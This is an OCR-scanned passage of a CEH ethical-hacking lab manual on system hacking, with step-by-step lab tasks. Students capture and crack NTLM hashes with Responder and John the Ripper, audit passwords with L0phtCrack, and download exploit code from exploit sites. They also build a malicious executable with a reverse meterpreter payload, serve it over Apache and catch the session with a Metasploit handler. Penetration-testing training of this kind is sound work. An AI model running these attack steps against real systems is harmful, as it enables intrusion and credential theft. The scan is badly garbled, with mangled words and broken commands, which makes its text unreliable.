CEH Lab Manual System Hacking Module 06 (CoH Lab Manual Page 498© Vatuaie Po you Inowladce B Wobewercise DD Workbook review (CoH Lab Manual Page 495, [Module 06 - System Hacking System Hacking System hacking is the provess of testing computer systems and software for security uluerabiltes that an attacker could exploit to gain access to the organisation systems to steal or misuse sensitive information Lab Scenario Since security and compliance are high priorities For most organizations, attacks on an ‘organization's computer systems take many different forms such as spoofing, smurfing, and other types of Denial-of Service (DoS) attacks. ‘These attacks are designed to harm or interrupt the use of operational systems. adler, you gathered all possible information about the target through techniques such as footprinting, scanning, enumeration, and vulnerability analysis. In the first step (footprinting) of the security assessment and penetration testing of your ‘organization, you collected open-source information about your organization, In the second step (scanning), you collected information about open ports and services, OSes, and any configuration lapses. In the third step (enumeration), you collected information about NetBIOS names, shared network resources, policy and password details, users and user groups, routing tables, and audit and service settings. In the fourth step (vulnerability analysis), you collected information about network ‘vulnerabilities, application and service configuration errors, applications installed on the target system, accounts with weak passwords, and files and folders with weak permissions. Now, the next step for an ethical hacker or a penetration tester is to perform system hacking on the target system using all information collected in the earlier phases. ‘System hacking is one of the most important steps that is performed after acquiring, information through the above techniques. ‘This information ean be used to hack the target system using various hacking techniques and strategies. ‘System hacking helps to identify vulnerabilities and security flaws in the target system and predict the effectiveness of additional security measures in strengthening and protecting information resources and systems from attack. ‘The labs in this module will provide you with a real-time experience in exploiting underlying vulnerabilities in target systems using various online sources and m hacking techniques and tools. However, system hacking activities may be illegal depending on the organization's policies and any laws that are in effect. As an ethical hacker of pen tester, you should always acquire proper authorization before performing system hacking. Lab Objectives “The objective of this lab is 10 monitor a target system remotely and perform other tasks that include, but arc not limited to: = Bypassing access controls to gain access to the system (such as password cracking and vulnerability exploitation) Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.[Module 06 - System Hacking Acquiting the rights of another user of an admin (privilege escalation) Creating and maintaining remote access to the system (executing applications such as trojans, spyware, backdoors, and keyloggers) Hiding malicious activities and data theft (executing applications such as Rootkits, steganography, etc.) Hiding the evidence of compromise (clearing logs © Toots Lab Environment ‘demonstrated in this lab are ‘To carry out this lab, you need: available in . eae Windows 10 viral machine ToolsicEHv11 © Windows Server 2019 virtual machine Module 06 System Hacking ‘Windows Server 2016 virtual machine Parrot Security virtual machine Ubuntu viral machine ‘Web browsers with an Internet connection Administrator privileges to nun the tools Lab Duration “Time: 205 Minutes Overview of System Hacking In preparation for hacking a system, you must follow a certain methodology. You need to first obtain information during the footprinting, scanning, enumeration, and vulnerability analysis phases, which can be used to exploit the target system. ‘There are four steps in the system hacking; (CoH Lab Manual Page 496 Gaining Access: Use techniques such as cracking passwords and exploiting, ‘vulnerabilities to gain access to the target system. Escalating Privileges: Exploit known vulnerabilities existing in OSes and software applications to escalate privileges Maintaining Access: Maintain high levels of access to perform malicious activities such as executing malicious applications and stealing, hiding, or tampering with sensitive system files Clearing Logs: Avoid recognition by legitimate system users and remain undetected by wiping out the entries corresponding to malicious activities in the system logs, thus avoiding detection. Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.(CoH Lab Manual Page 497 Module 06 - System Hacking Lab Tasks Ei cal hackers or pen testers use numerous took nd techniques to hack the target systems. Recommended labs that will assist you in leaming various system hacking techniques include: a Access to the System 1.1 Perform Active Online Attack to Crack | y Armitage the Systems Password using Responder | _~ ‘ 1.2. Audit System Passwords using 1 v LiphiCrack, 13 Find Vulnerabilities on Exploit Sites v v 14 Pxploit Client-Side Vulnerabilities and | ¥ Establish a VNC Session 1.5 Gain Access toa Remote System using v ‘ThePatRat 1.6 Hack a Windows Machine with a Malicious Office Document using V v 1.7 Perform Buffer Overflow Attack to i Gain Access to a Remote System x * 7 | Pexlowm Paege Escalation to Gaiaigher [yy 7 Peivileges 2 Escalate Privileges using Privilege Escalation Tools and Exploit Client v y Side Vulnerabilies 22, Hack a Windows Machine wing Metasploit and Perform Post- y y Exploitation using Metepreter Maintain Remote Access and Hide Malicious | y j 3 Y 4 y Activities 3.1 User System Monitoring and qv v Surveillance using Power Spy User System Monitoring and q 7 Surveillance using Spytech SpyAgent 33 Hide Files using NTFS Streams V V 34 Hide Data using White Space 1 Steginography 35,_Image Stegmography using OpenStego | v 3.6 Covert Channels using Covert” V v Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.(CoH Lab Manual Page 498 [Module 06 - System Hacking 4g | Clear Logs to Hide the Evidence of v y ¥ Compromise 41 View, Enable, and Clear Audit Policies y ¥ using Auditpol 42. Clear Windows Machine Logs using Various Utilities 43° Clear Linux Machine Logs using the y y BASH Shell 44 Clear Windows Machine Logs using CCleaner Remark C-Counel has prepared a considered amoust of ab exercises for sadn and at their fre ime to enhance their knee: ant sil ‘*Core - Lab esercis(s) mariod under Core ae recommended by Seday else o practice dung the 5 day dass Counel to be practised during the ‘r*Setfstudy Lab exezciso(s) marked under sls foe students wo practise at their fue tse. Stops v0 access the alditinal ab exezesus canbe found n the Best page of CHV volume | book. ‘SeiLabia ~ Lab crc} mene ker ibs we vals in our Labs sohiion. aba i'n chomd-ted vistual ab cavitonmeat preenatiured with vulncrabakcs, exploits, cools and seeps, and ean be accessed from anywhore with an Intcnet eganceton. [Fyou are interest fo learn mote about our dLabs solution, please contact your taining center or vist haps) /labscenunel.org- Lab Analysis Analyze and document the results related to this lab exercise. Give your opinion on the target’s security posture and exposure, PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.oN KEY © Vatuable [aformation AF Vest Your Knowles Web Beercise 1D Workbook Review (CoH Lab Manual Page 499 [Module 06 - System Hacking Gain Access to the System Gaining access refers tothe proces of obtaining unauthorized access tothe target system to modify or steal sensitive information. Lab Scenario For a professional ethical hacker or pen tester, the first step in system hacking is to sin access to a target system using information obtained and loopholes found in the system's access control mechanism. In this step, you will use various techniques such as password cracking, vulnerability exploitation, and social engineering to gain access to the target system. Password cracking is the process of recovering passwords from the data transmitted by a computer system or stored in it. It may help a user recover a forgotten or lost password or act as a preventive measure by system administeators to check for casily breakable passwords; however, an attacker can use this process to gain unauthorized system access. Password cracking is one of the crucial stages of system hacking. Hacking often begins, with password cracking attempts. A password is a key piece of information necessary to access system. Consequently, most attackers use password-cracking techniques to gain unauthorized access, An attacker may either crack a password manually by guessing it or use automated tools and techniques such as a dictionary or brute-force method. Most password cracking techniques are successful, because of weak or easily guessable passwords. Vulnerability exploitation involves the execution of multiple complex, interrelated Steps to grin access to a remote system. Attackers use discovered vulnerabilities (0 develop exploits, deliver and execute the exploits on the remote system. “The labs in this exercise demonstrate how easily hackers can gather password information from your network and demonstrate the password vulnerabilities that exist in computer networks. Lab Objectives ® Perform active online attack to crack the system’s password using: Responder ® Audit system passwords using LOphtCrack Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.[Module 06 - System Hacking * Find vulnerabilities on exploit sites = Exploit client-side vulnerabilities and establish a VNC session © Gain access to a remote system using Armitage © Hack a Windows machines with 2 malicious Office document using ‘TheFatRat = Perform buffer overflow attack to gain access to a remote system Lab Environment ‘To carry out this lab, you need: ® Windows 10 virtual machine = Windows Server 2016 virtual machine © Parrot Security virtual machine © Ubuntu virtual machine © Web browsers with an Internet connection © Administrator privileges to run the tools + LophtCrack located at B\GEH-Teols\CEHV11 Module 06 System Hacking\Password Cracking ToolsiLOphtCrack * You can also download the latest version of LOphtGrack from its official website. IF you decide to download the latest version, the screenshots shown, in the lab might differ from what you sce on your screen. Lab Duration “Time: 100 Minutes Overview of Gaining Access ‘The previous phases of hacking such as footprinting and reconnaissance, scanning, enumeration, and vulnerability assessment help identify security loopholes and ‘vulnerabilities that exist in the target organizational IT assets. You can use this information to gain access to the target organizational systems. You ean use various techniques such as passwords cracking and vulnerability exploitation to gain access to the target system. Perform Active Online Attack to Crack the System’s Password TASK 1_ using Responder Here, we will use the Responder tool to extract information such as the target stem’s OS version, client version, NILM client IP address, and NLM username and password hash Note: In this task, we will use the Ubuntu (10.10.10.9) victual machine as the host machine and the Windows 10 (10,10.10.10) virtual machine as the target machine. (CeH Lab Manual Page S00 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.usr cik cal Mokicase Name Reson) and NEES, (NaBlOS Name Sea) se two main dement of Windows OSes that ae wed to peo came resoltion forbes poet ti sere Bk These serves ar enabled by default in Windows Osesand can be nc 0 extoct he pve hshes from ar By ening for 1R/NBLNS Irons sequest an stacker can spoof the seover ta send 3 response chiming to be the hptimate server Aer the wet syste aces the eosnecta ts posible gain he ‘itm’ sere byminga tool sich a Responder (CoH Lab Manual Page S02 Module 06 - System Hacking ‘Turn on the Ubuntu and Windows 40 virtual machines. In the Ubuntu virtual machine, click on the Ubuntu button to log in. In the Password ficli, type toor and press Enter to sign in, Figure 12: Login athe mot user Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 4, In the left pane, under Activities list, scroll down and click the a icon to open the Terminal window. Fig 1.1. Open Tena window task 4. 5. A Terminal window appears. In the Terminal window, type git eter —_ inttpsi/github.com/SpiderLabs/Responder and press Enter to install the Responder tool. CE se RA Coe Lr Peon 7 ed peri sacs : recy Figur 4 Coming Responder oa Note: You can also access the tool repository from the CEH-Teels folder available in Windows 10 virtual machine, in case, the GitHub link does not exist, or you are unable to clone the tool repository. Follow the steps below in onder to access CEH-Tools folder from the Ubuntu virtual machine: (Ce Lab Manual Page S02 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking Click on Files in the lefi-hand pane of Desktop. 'Ihe home window appears; click on + Other Locations from the left-hand pane of the window. estoy able Responder Templates Videos 8 ownoads videos Fg 115 Opn Otitis * The + Other Locations window appears; ype smbs/40.10.10.40 in the Connect to Server field and click the Conneet button. me a ian 1 batop © windows eewor Foxe Bmw Sooo Ars B_ wovoowsi0 Brave a is are : connect server (CoH Lab Manual Page S02 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking +A security pop-up appears. ‘Type the Windows 10 viral machine credentials (Username: Admin and Password: Pa$SwOrd) and click the Connect button. Password required For 10.10.10.10 Uectane Domain EEN rs Forget password immediately © Remember password until you logout Remember forever Fg 117 Sensy ppp Responder isan * A window appears, displaying the Windows 10 shared folder; then, Perens ner ee double-click the CBH-Teals folder. MNS prisoner. Te responds to specie NIFT- NS (NeiBlOS Name Service) ques base cn thei nme sufi by dei, he tol only responds toa Fie Server Soccer ohh forSMs Home vocuments 8 Downloads Fg 1158 Wink 10 del idee (CoH Lab Manual Page S08 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking + Navigate to CEHW14 Module 06 System Hacking\GitHiub Tools and copy the Responder folder. es a oa Bie @ sre ovese | EERE | Tat powesplt Reson i ep oD @) Home 1D pesktop 9 Documents 8. Downloads 2 music ig 12 Copy Repl aer Paste the Responder folder in the Home discctory. Desktop Documents Downloads Music —~ictures Desktop Public | GERERRIN | templates Documents Downloads Pictures (CoH Lab Manual Page 50S Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 6. Now, switch to the Windows 40 virtual machine and log in with Username: Jason and Password: qwerty. B Task Log Into Jason ‘Account Figure 1.1.1: Login a Jason 7. Switch back to the Ubuntu virtual machine. In the Terminal window, type ed Responder sinc press Enter to navigate to the Responder tool fokler. Note: Ifyou get logged our of Ubuntu, then double-click on the screen, enter the password as toor, and press Enter. Brasx 4.3 = 8. Type chmod +x Responderpy and press Enter to grant permissions to the in script Responder " 9. Now, type sudo /Responder.py -1 ens33 and press Enter. In the password for ubuntu fickd, type toor and press Enter to run Responder tool. Note: The passwonl that you type will not be visible. Note: I: specifies the interface (here, ens33). The interface might differ in your lab environment. (EH Lab Manual Pope S06 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.(EH Lab Manual Page $07 Module 06 - System Hacking 10. Responder starts listening to the network interface for events, as shown in the screenshot. See aot Fig 1.13 Responder sing Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 11. Switch to the Windows 10 virtual machine, right-click on the Start icon, Bras and click Run. Connect to the Shared Directory ‘The Run window appears; type WCEH-Tools in the Open fick! and click OK. [eu x] yj Typethe name of a program, folder, document, or Internet {ST rezource, and Windows will open it for you Open: 13. Leave the Windews 40 virtual machine running and switch back to the Ubuntu virtual machine. Ethical Macking and Countermeasures Copyright © by E-Soumell (CoH Lab Manual Page S08 ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 14, Responder starts capturing the access logs of the Windows 10 virtual machine. It collects the hashes of the logged-in user of the target machine, as Boras 4. shown in the sercenshot View and Crack eee errs Obtained Hash F a Fig 1.16 Fath oben by Responder 15, By default, Responder stores the logs in Home/Responderilogs. Navigate to the same location and double-click the SMB-NTLMv2-SSP-10.10.10.10.txt file 16. A log file appears, displaying the hashes recorded from the target system user, as shown in the screenshot Analyzer Polsoners- Responder | SHO essionlog Sessioniog Sessionlog | | NeTEM2 SSP. ot Figs 117 Render De (CeH Lab Manual Page S08 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 17. Now, attempt to crack the hashes to leam the password of the logged-in user (here, Jason.) 18. To crack the password hash, the John the Ripper tool must be installed on ‘your system. To install the tool, open a new Terminal window, type sudo ‘snap Install john-the-ripper, and press Ent 19, In the password for ubuntu field, type toor and press Enter to install the John the Ripper tool 20. After completing the installation of John the Rippes, type sudo john IhomelubuntulResponderilogs/ and press Enter. Note: The log file name will differ in your lab environment. Here, the log file name is SMB-NTLMv2-SSP-10.10.10.10.txt. 21, John the Ripper starts cracking the pa password in plain text, as shown in the screenshot. sword hashes and displays the Fg 1.1 Pond cached secs 22. This concludes the demonstration of pesforming an active online attack to mnder. erick a password using Resp 23. Close all open windows and document all the acquired information, 24. ‘Turn off the Ubuntu virtual machine, 25. Close all windows on the Windaws 10 virtual machine. Click the Starticon in the bottom lefchand comer of Desktop, click the usceicon (il), and click Sign out. You will be signed out from Jason’s account. (CoH Lab Manual Page 520 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.EB TASK 2 Trask 2.4 Install and Configure LophtCrack LipGeak ina twol designed aut pesswond aad wonwer ppiations Ie eenvers Ue Micrnoft Windows psswoud with die bo ofa dione, bbe ‘sib table and brute force stack [cx also bem to check te (CoH Lab Manual Page S22 Module 06 - System Hacking Cee ees Audit System Passwords using LophtCrack In this lab, as an ethical hacker or penetration tester, you will be running the LOphtCrack tool by providing the remote machine’s administrator with user hort amount of time credentials, User a unt passwords that are cracked in a are weak, meaning that you need to take certain measures to strengthen them, Here, we will audit system passwords using LOphtCrack. 1, Launch the Windows 10 and Windows Server 2046 vircual machines. 2. Switch to the Windows 10 virtual machin Admin and PaS$wOrd. 3. Navigate to EACEH-ToolsiCEHv11 Module 06 System Hacking\Password Cracking Tools\LOphtGrack; double-click le7setup_v7.1.5 Winéd.exe, id log in with the credentials Note: Ifa User Account Control pop-up appears, click Yes. Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.[Module 06 - System Hacking 4, LOphtCrack starts loadings once the loading completes, the LophtGrack Setup window appears; click Next. BF Tapiacracl 7 (Wineay Scop Welcome to LOphtCrack 7 (Win64) Setup ‘eu cuide you trough the stalaten of phirack 7 recommended tat you cose al ote aoeleabone before strtng Setup. The wl make Rposebe fo sdate ‘elevane system Aes vtnauthving to reboot your Gorter Cle Nest to conte ge 2 speek Sup wid 5. Follow the wizard-driven installation steps to install LophtGrack. 6. After completing the installation, the Completing LOphtCrack 7 Setup wizard appears. Hnsure that the Run LOphtGraek 7 checkbox is selected and click Finish, Note: The LophtCrack version might differ in your lab environment. Taparock 7 nb Seop Completing LophtCrack 7 (Win64) Setup Lophcreck 7 (U6) ha een tld on ya computer (lek Fh to dose Seti. gee 12: Lipo Sep wind: dk Fh (CoH Lab Manual Page S12 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 7. ‘The LOphyCrack 7 - Trial pop-up appears; click the Proceed With Trial button, eee reread eed as Note: IF an Update Available pop-up window appears, then click Skip This, Update. 8 In the next wizard, click the Password Auditing Wizard button rad ding Wars ee Seen Figine 124: Stan Prervord ling wine (CoH Lab Manual Page 522 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.(eH Lab Manual Pope Sit Module 06 - System Hacking 9. ‘The LE7 Password Auditing Wizard window appears; click Next. Figme 1.25: Psewoed ating wine window 10, In the Choose Target System Type wizard, ensure that the Windows radio button is selected and click Next. Figure 1.26 Chosee usp tem ype option Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 11, In the Windows Import wizard, select the A remote machine radio button and click Next. ee Figure 127: Windows impor pion 12, In the Windows Import From Remote Machine (SMB) wizard, type in the below details: © Host: 10.10.1016 (IP address of the remote machine [Windows Server 2016)) clect the Use Specific User Credentials radio button. In the Gredentials section, type the login credentials of the Windows Server 2016 virtual machine (Username: Administrator; Password: $$wOrd). "IE the machine is under a domain, cater the domain name in the Domain section. Here, Windows Server 2046 belongs to the CEH.com domain. (CoH Lab Manual Page S15, Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 13, Once you have entered all the required details in the fields, click Next to proceed. Peer) Figine 1.28; Windows import fr eros machi (SMB) 14, In the Choose Audit Type wizard, sclect the Therough Password Audit radio button and click Next eee de Chote the aut type section ofthe LCT wiz (CoH Lab Manual Page S16 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking In the Reporting Options wizard, select the Generate Report at End of Auditing option and ensure that the 6SV report type radio button is, selected. Click the Browse... button to store the report in the desired Tocatic Si ee ge 1.210: Repoting options 16, The Choose report file name window appears; select the desired location (here, Desktop) and click Save. NE Ghee por ticname 4 rere) Demon > Orgmnize~ — Newfkier 2D Mase ” BB Systemaz certificates Bi Videos [i TorBeouser @ onedinve [ai thiepe Fle name | Repor (2018-11 40857 See Snveastype: CSV Files C5) 1 Hide Folders (CoH Lab Manual Page S27 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.(CoH Lab Manual Page S18 Module 06 - System Hacking 17, In the Reporting Options wis ave the file appears under the Report File Location field; click Next. a eee d, the selected location to 18. The Job Scheduling wizard appears. Ensure that the Rum this job immediately radio button is selected and click Next 2 ston Figie 1.21% Job seeding osion Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 19. Check the given details in the Summary wizard and click Finish. Figure 1214: Summary option 20, LOphtGrack starts cracking the passwords of the remote machine. In the Jower-right comer of the window, you can see the status, as shown in the screenshot. Figure 12.15: Cmcing passton in progres (CoH Lab Manual Page 519 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 21. After the status bar completes, LOphtCrack displays the cracked passwords of the users that are available on the remote machine, as shown. ‘Analyze the in the screenshot Result B_rasn 2.2 Note: It will take some time to crack all the passwords of a remote system. 22. After successfully attaining weak and strong passwords, as shown in the screenshot, you can click the Step button in the bottom-right corner of the window. ge 1.2.16 Passwords succes ech 23, Asan ethical hacker or penetration tester, you can use the LOphtCrack tool for auditing the system passwords of machines in the target network and later enhance network security by implementing a strong password policy for any systems with weak passwords. 24. This concludes the demonstration of auditing system passwords using LOphiGrack, 25. Close all open windows and document all the acquired information. 26, ‘Tur off the Windows Server 2046 virtual machine. S_task 3 _ Find Vulnerabilities on Exploit Sites Here, we attempt to find the vulnerabilities of the ta sites such as Exploit DB and Security Focus. ret system using various exploit D vase a9 1. On the Windows 10 virtual machine, open any web browser (here, Fina Mozilla Firefox) and navigate to https:iwww.exploit-db.com, ‘nding Vulnerabilities on Exploit DB (en tab Manual Page $20 Ethical Hacking and Countermeasures Copyigh © by EE-Counell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking iB demnss 2. ‘The Exploit Database website appears; you can click any of the latest daa de kek ts vulnerabilities to view detailed information, or you can search for a tet wera of specific vulnerability by entering its name in the Seareh ficld, ‘ios Oe device and 2ppcions You can ue theses 0 find evant ‘unerabcsabn the Inger syst based on the inmate sn futher download dhe splot fom the dite anal us exploitation tole sachs Nehspl to gin Kee joe elee bem of noe Ws Date = D A V Tile Type Platform Author 3. Click on the (i) icon in the top-left comer of the website and select the SEARGH EDB option from the list to perform the advanced search perenne eo loa pat abeom Date Wi pesos 9 x {sutentlanager 8 750 toa Figine 132: Seket SEARCH EDI option (CoH Lab Manual Page 522 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.(CoH Lab Manual Page 522 Module 06 - System Hacking 4, ‘The Exploit Database Advanced Search page appears. In the Type field, select any type from the drop-down list (here, remote). Similarly, in the Platform ficld, select any OS (here, Windows_x86-64). Click Search. Note: Here, you can perform an advanced search by selecting vasious search. filters to find a specific vulnerability. gine 1.2.5 Epic Database Advanced Search page 5, Scroll down to view the result, which displays a list of vulnerabilities, as shown in the screenshot. Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.(CoH Lab Manual Page 522 [Module 06 - System Hacking 6. You can click on any vulnerability to view its detailed information (here, CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass). © tios/mmueric-de Date» DA V The Type Platform Author Candis Spe Habe Ow Wot DEP Bynes) zoisoi2s ¢ a x remote Wncene 8664 Mocs Bu 2x ene oOo ‘nan 564 Se 10 Oe aes (oH Epps) urea erate Co Exacton US17-07), cae Wed 012. asi701) : amonce gx SOMRFIP S207 -1 Renae es Jt quent anieonse ‘Acca Vata Mache Escape Wncons 564 ast Figure 1.34 List of ular, Detailed information regarding the selected vulnerability such as CVEID, author, type, platform, and published data is displayed, as shown in the screenshot. & Youcen click:ca she dowload cow Mlle whe emote seesion ts download the exploit code CloudMe Syne 1.11.2 Buffer Overiow - WoW6d (DEP Bypass) ‘become a Certs Eoeio: CVE Autor, pe! Plato: Dat: Rene ooen 08 ertia: % igus 135 Vulacability information Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 9. ‘The Opening file pop-up appears; select the Save File radio button and click OK to download the exploit file. 10, Navigate to the downloaded location (here, Downloads), right-click the saved file, and sclect Edit with Notepad++ 11. A Notepadt+ file appears, displaying the exploit code, as shown in the screenshot. een riboomien Op) Napaaee o8RS + 5G) seh 2clae/te/83/>1FeBHos|emn esi @ taploie Ticker Clow Syme Vidic} balfer Overflow ~ WONG] = (HEP Bipase) 4 vendor monepege nazne:/ vee. choutme.con/es 4 worted co MONG tam AtSEE1//nisSABiGit=aSGR/RRDAGASR/AS2AR tu elton Rene (oeseus. 312) pes to ciaseasunsoress() UAT gescere.ait) Gnetbacres, § NOV FAX, cVORD PTR 05: (ERK) 6 RETH (QeS0s4.c13) Oneceesvez) ¢ aces exiest SET (gescore.cil] SGnospeeceo, TOP Fat # RETH (gesCore-all) Gneantvord yt-1-aih}, Gnezoeeses) 6 INC HE 6 RETH (ges0u8 <1) Gnciectiae, ¢ 70° EOX'# RETH (9eS004.a1} Gneebivone,$ MEO EK # RETW (1ibeee = ava-1eai0) Figure 1246 Papi e 12. This exploit code can further be used to exploit vulnerabilities in the target system. TNNem ata 13. Close the web browser. Fcie 14, Similarly, you can search vulnerabilities and download their exploit from ‘Vinierabtaeaion' the SecurityFocus website, ‘SecurityFocus 15. Open any web browser (here, Mozilla Firefox) and navigate to httpsiiwww.securityfocus.com. (et Lab Manual Pope 524 ‘hla Macking and Countermeasures Copyright ©by BE Comme "Al RightsReserved, Reproducton fs Stcty Prose.(CoH Lab Manual Page 525 [Module 06 - System Hacking 16, The SecurityFocus website appears click the Search all vulnerabili link at the bottom of the page to search vulnerabilities by CVE number ‘or by vender, title, oF version. searnson x jo ce oan >Secuti ‘vulnerabiies tiaensicn ecocare eeesaBny Unde Video ~ rag Mating List csi ate o> Preveton nant for Windows Meh toc! Sean Yuerbies ‘zee hype vanes Figure 1.37: Securinocus web Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 17. A new webpage displaying a list of vulnerabilities appears. Click on any vulnerability available on the site and look at the data about the exploit. ‘The area to focus on is the exploit section, accessed by clicking on the ‘exploit tab of the vulnerability. Farrer oe wsecutyo fugtrag is 109974 hss: Uneown ve-2019-9829 Neo Published 3a 26 2019 22:0006 Updated: 24126 2019 32:08 crea ie Emmench of RWW Research Gmblt and Mates "Mal" Saeancks ‘bunt Ubuntu 18.08 UTS bunt Ubuntu Lina 1.08 LTS Leotfce Ubreotice 6.2.1 Figure 1.38 Detaled information about the vulaeity 18, Now, navigate back to the Vulnerabilities search page. Here, search the vulnerability €VE-2013-4627 by entering its CVE number in the Search by GVE field. After entering the CVE ID, click the Submit button or press Enter. (CoH Lab Manual Page 526 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.& Yeuan Similac ue ether espit sites sich is VulDB (heaps ruth com), MITRE CVE hups//evessineog), ‘Vuiners (hep /sners com) tral CIRCL CVE Searels (dups//evecily) wo find exuetsystam wulecrabts, (CoH Lab Manual Page 527 Module 06 - System Hacking 19. A result page appears, displaying the name of the searched vulnerability with its URL link, as shown in the screenshot, leon Figure 0 Sarchedvulneaiiy 20, Click on the vulnerability URL. A detailed description of the searched vulnerability appears; click on the exploit tab to sce the available exploit script 21. You can further click the link to the python script that represents the exploit to view the exploit code and later use the same seript to attempt an attack on the target system. This code can be used manually or can be placed into a tool B Aivoerch Sco and dane” )> © @ [0 Bi ns = Or NOS Advantech Studio and Indusoft Web Studio 'NTWebServer.exe" Directory Traver: The folowing expla is available: al aanerabibes/exploRs/ 56871. py Figure 13.10 exploit Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 06 - System Hacking 12. Close the web browser. 23. This concludes the demonstration of finding vulnerabilities on exploit sites ccurity Focus. such as Exploit Database and 24. Close all open windows and document all the acquired information, Exploit Client-Side Vulnerabilities and Establish a VNC TASK 4 . Session “This lab demonstrates the exploitation procedure enforced on a weakly patched Windows 10 machine that allows you to gain remote access to it through a remote desktop connection. Here, we will se how attackers can exploit vulnerabilities in target systems to establish unauthorized VNC sessions using Metasploit and remotely control these targets. Note: In this task, we will use the Parrot Security (10.10.10.13) virtual machine as the host system and the Windows 10 (10.10.10.10) virtual machine as the target system. Anackes use 1. ‘Tum on Parrot Seeurity vircual machine. nvsidevlnenbies LPORT=444-0 srootDesktop/Test.exe and press Enter. Note: Here, the IP address of the host machine is 10.10.1043 (Parrot Security virtual machine). 8. ‘This will goncrate Test.exe, a malicious fi screenshot. |, on Desktop, as shown in the Note: ‘To navigate to the Desktop folder, click Places from the top-section of the Desktop and click Home Folder from the drop-down options. Ia the attacker window, click File System from the left-pane and navigate to the location reotDesktop. (EH Lab Manual Pope 29 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking gre 14.5: Mabon eset geil Grasn 4.2 9. Now, create a directory to share this file with the target machine, provide ——————— the permissions, and copy the file ftom Desktop to the shared location Create Directory using the below commands: to Share Exploit "Type mkdir ivariwwwihtmi/share and press Enter to create a shared folder * Type chmod -R 755 Ivariwwwihtmi/share an! press Enter + ‘Type chown -R www-data-wwwedata [variwwwihtmlishare and press Enter * Copy the malicious file to the shared location by typing ep JrootDesktop/Test.cxe /varlwwwihtmlishare and pressing Enter Note: Here, we are sending the malicious payload through a shared directory; but in real-time, you can send it via an attachment in an email of through physical means such as a bard drive or pen drive (eH Lab Manual Page 30 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 06 - System Hacking 10, Now, start the apache service. ‘To do this, type service apache2 start Bras« 4.3 and press Enter, Launch Metasploit 11. ‘Type msfeonsole and press Enter to launch the Metasploit framework. 12. In msfconsole, type use exploitimultihandl TASK 4.4 and press Enter. Set the Payload (EH Lab Manual Pope 31 Ethical Making and Countermeasures Copy ‘A Rights Reserved. Reproductions by EE-Counel icy Prone.Module 06 - System Hacking 13. Now, set the payload, LHOST, and LPORTT. To do so, use the below commands: ‘Type set payload windows/meterpreterireverse top an press Enter * Type set LHOST 10.10.10.13 and press Enter "Type set LPORT 444 and press Enter 14, After entering the above details, type explott and press Enter to start the tener. Drasn « 15, Leave the Parrot Security virtual machine running, Run Exploit 16, Switch to the Windows 10 virtual machine 17, Open any web browser (here, Mozilla Firefox). In the address bar, type bttp2//10.10.10.13ishare and press Enter. As soon as you press enter, it ‘will display the shared folder contents, as shown in the screenshot. 18, Click Test.exe to download the file Note: 40.10.10.43 is the IP address of the host machine (here, the Parrot Security virtual machine). € © & 10.10.1013) Or] m» = Index of /share Name Last modified Size Descrintion 